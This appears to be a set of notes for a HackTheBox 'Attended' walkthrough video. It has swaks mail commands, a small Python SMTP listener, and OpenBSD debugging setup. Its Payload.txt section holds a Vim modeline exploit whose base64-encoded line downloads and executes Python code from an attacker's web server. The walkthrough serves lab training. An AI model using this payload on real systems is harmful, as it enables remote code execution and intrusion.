Attended

Search…

Attended

Notes for https://youtu.be/uAvvrBO7zlk

User
Send mails via swaks
1
1) swaks --from '[email protected]' --to '[email protected]' --header "Subject: Please subscribe" --body 'and click the like button' --server attended.htb
2
2) swaks --from '[email protected]' --to '[email protected]' --header "Subject: Please subscribe" --body 'and click the like button' --server attended.htb
3
3) swaks --from '[email protected]' --to '[email protected]' --header "Subject: Please subscribe" --body 'and click the like button' --server attended.htb --attach payload.txt
Copied!
Mail Server
1
from __future__ import print_function
2
from datetime import datetime
3
import asyncore
4
from smtpd import SMTPServer
5
​
6
class EmlServer(SMTPServer):
7
    def process_message(self, peer, mailfrom, rcpttos, data, mail_options=None,rcpt_options=None):
8
        print(f"From: {mailfrom}")
9
        print(f"To: {rcpttos}")
10
        print("Data:")
11
        for line in data.split(b"\n"):
12
            print(line)
13
​
14
def run():
15
    EmlServer(('0.0.0.0', 25), None)
16
    try:
17
        asyncore.loop()
18
    except KeyboardInterrupt:
19
        pass
20
​
21
if __name__ == '__main__':
22
    run()
Copied!
Payload.txt
This pulls a (python-) file called "x" from our webserver and executes it: 
1
:!echo aW1wb3J0IHJlcXVlc3RzIGFzIHI7ZXhlYyhyLmdldCgnaHR0cDovLzEwLjEwLjE0Ljc4L3gnKS50ZXh0KQ==| openssl base64 -d -A | python2.7 -
2
||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=1:fdt="
Copied!
HTTP Reverse Shell
Root
Prepare OpenBSD VM
1
export PKG_PATH=https://mirror.fsrv.services/pub/OpenBSD/6.8/packages/amd64/
2
pkg_add -v gdb
3
pkg_add wget
4
pkg_add nano
5
pkg_add py3-pip
6
pkg_add git
7
wget -O ~/.gdbinit-gef.py -q https://github.com/hugsy/gef/raw/master/gef.py
8
echo source ~/.gdbinit-gef.py >> ~/.gdbinit
9
export LC_CTYPE=C.UTF-8
10
egdb
Copied!
EAX-Finder
Final Exploit
​

HackTheBox - Previous

APT

Next - HackTheBox

Delivery

Last modified 5mo ago

Copy link

Contents